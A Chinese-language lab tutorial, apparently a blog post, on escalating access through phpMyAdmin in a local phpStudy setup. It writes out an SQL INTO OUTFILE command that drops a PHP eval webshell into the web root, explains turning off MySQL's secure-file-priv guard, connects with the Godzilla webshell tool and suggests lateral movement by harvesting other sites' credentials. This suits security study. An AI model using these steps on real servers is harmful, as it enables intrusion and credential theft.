phpMyAdmin权限提升

免责声明:本文技术仅用于网络安全学习研究,请严格遵守《网络安全法》等相关法律法规,严禁未经授权对任何网络、系统实施攻击或测试,违规操作引发的一切法律责任由使用者自行承担,作者不承担连带责任。

一、环境搭建

小皮下载phpMyAdmin,绑定好网站

网站配置

对应php版本要求5.5以上,需要使用https

下载好高版本php,去网站管理这里设置

选择https,生成开发者测试证书,会自动填充,确认之后等待apache重启

用户名和密码为绑定的网站的(实战中可通过泄露得到)

登陆进去,出现报错:配置文件现在需要一个短语密码。

在下载的phpMyAdmin目录下找到文件"config.sample.inc.php"

将文件复制,重命名为"config.inc.php"

打开找到$cfg'blowfish_secret' = '';这一行,在单引号里填入任意字符串(长一些)

保存文件后刷新页面,报错解决

警告:Undefined index: utf8

还是config.inc.php文件,在数据库配置段添加字符集定义

cfg\['Servers'\]\[i]'charset' = 'utf8';

cfg\['Servers'\]\[i]'collation_connection' = 'utf8_general_ci';

二、实操

SQL命令行写入木马文件

复制代码
SELECT '<?php eval($_POST["pass"]);?>' INTO OUTFILE 'D:\\phpstudy_pro\\WWW\\1.php'

(实战中phpMyAdmin存放目录可尝试通过报错得到,\\双写防止转义)

报错,原因是 secure-file-pive是MySQL 安全限制参数,用于禁止**SELECT ... INTO OUTFILE** 随意写入服务器文件

解决:找到小皮当前使用数据库的my.ini配置文件,在mysqld写入secure-file-priv = "",保存,重启数据库

写入成功

访问1.php文件

哥斯拉连接

连接成功

横向移动的话可以去查找该数据库下其他网站配置文件等,查找源码或登录的账号密码之类的。

相关推荐
goujunwe3 小时前
GEO 评估方法:如何自测你的内容,会不会被 AI 引用
搜索引擎·网络安全·游戏引擎·全文检索·中文分词
Koi慢热13 小时前
DayDayMap学术社区体验:卫星网络测绘专题用下来怎么样
网络·人工智能·windows·web安全·网络安全
orange....19 小时前
VMware 双网卡配置:宿主机切换网络时 Ubuntu 固定 IP 访问方案
网络·ubuntu·网络安全
m0_715674431 天前
智能化+基于行标+场景化 政务数据库审计与风险监测全维度解决方案
网络·数据库·安全·网络安全·政务
蒲公英eric1 天前
从旧接口泄露到 OAuth 保护:DVWA API 模块完整漏洞分析教程
web安全·ai·ctf·dvwa·ai安全·api模块
IPdodo_1 天前
住宅 IP 与数据中心 IP 到底差在哪:用 RDAP、BGP 和多源证据做工程判定
网络·网络安全·代理模式·ip
2501_916008891 天前
SSE 和 gRPC 流式接口如何抓包,调试 SSE 与 gRPC 流式接口
网络协议·计算机网络·网络安全·ios·adb·https·udp
Bruce_Liuxiaowei1 天前
2026年9月第3周网络安全形势周报
安全·网络安全
菜根Sec1 天前
没钱考网络安全证书了
网络·网络安全·信息安全·信息安全工程师·网络安全公司
云水一下2 天前
零基础玩转bWAPP靶场(六十七):Cross-Domain Policy File (Flash)
web安全·flash·bwapp